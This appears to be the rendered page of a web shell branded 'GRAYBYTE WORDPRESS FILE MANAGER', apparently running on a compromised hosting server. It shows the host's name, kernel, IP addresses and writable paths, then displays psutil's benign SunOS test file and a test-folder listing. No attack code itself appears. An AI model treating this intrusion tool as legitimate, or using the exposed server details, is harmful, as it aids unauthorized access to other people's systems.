✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.165
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/cloudlinux/venv/lib/python3.11/site-packages/psutil/tests//test_sunos.py
#!/usr/bin/env python3

# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Sun OS specific tests."""

import os
import unittest

import psutil
from psutil import SUNOS
from psutil.tests import PsutilTestCase
from psutil.tests import sh


@unittest.skipIf(not SUNOS, "SUNOS only")
class SunOSSpecificTestCase(PsutilTestCase):

    def test_swap_memory(self):
        out = sh('env PATH=/usr/sbin:/sbin:%s swap -l' % os.environ['PATH'])
        lines = out.strip().split('\n')[1:]
        if not lines:
            raise ValueError('no swap device(s) configured')
        total = free = 0
        for line in lines:
            line = line.split()
            t, f = line[-2:]
            total += int(int(t) * 512)
            free += int(int(f) * 512)
        used = total - free

        psutil_swap = psutil.swap_memory()
        self.assertEqual(psutil_swap.total, total)
        self.assertEqual(psutil_swap.used, used)
        self.assertEqual(psutil_swap.free, free)

    def test_cpu_count(self):
        out = sh("/usr/sbin/psrinfo")
        self.assertEqual(psutil.cpu_count(), len(out.split('\n')))


if __name__ == '__main__':
    from psutil.tests.runner import run_from_name
    run_from_name(__file__)


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
11 Feb 2026 8.04 AM
root / root
0755
__pycache__
--
11 Feb 2026 8.04 AM
root / root
0755
__init__.py
57.85 KB
20 Jan 2026 1.01 PM
root / root
0644
__main__.py
0.286 KB
20 Jan 2026 1.01 PM
root / root
0644
runner.py
10.941 KB
20 Jan 2026 1.01 PM
root / root
0644
test_aix.py
4.402 KB
20 Jan 2026 1.01 PM
root / root
0644
test_bsd.py
20.563 KB
20 Jan 2026 1.01 PM
root / root
0644
test_connections.py
20.424 KB
20 Jan 2026 1.01 PM
root / root
0644
test_contracts.py
27.099 KB
20 Jan 2026 1.01 PM
root / root
0644
test_linux.py
93.054 KB
20 Jan 2026 1.01 PM
root / root
0644
test_memleaks.py
14.676 KB
20 Jan 2026 1.01 PM
root / root
0644
test_misc.py
33.838 KB
20 Jan 2026 1.01 PM
root / root
0644
test_osx.py
6.433 KB
20 Jan 2026 1.01 PM
root / root
0644
test_posix.py
16.622 KB
20 Jan 2026 1.01 PM
root / root
0644
test_process.py
61.607 KB
20 Jan 2026 1.01 PM
root / root
0644
test_sunos.py
1.302 KB
20 Jan 2026 1.01 PM
root / root
0644
test_system.py
35.078 KB
20 Jan 2026 1.01 PM
root / root
0644
test_testutils.py
14.276 KB
20 Jan 2026 1.01 PM
root / root
0644
test_unicode.py
11.94 KB
20 Jan 2026 1.01 PM
root / root
0644
test_windows.py
34.343 KB
20 Jan 2026 1.01 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF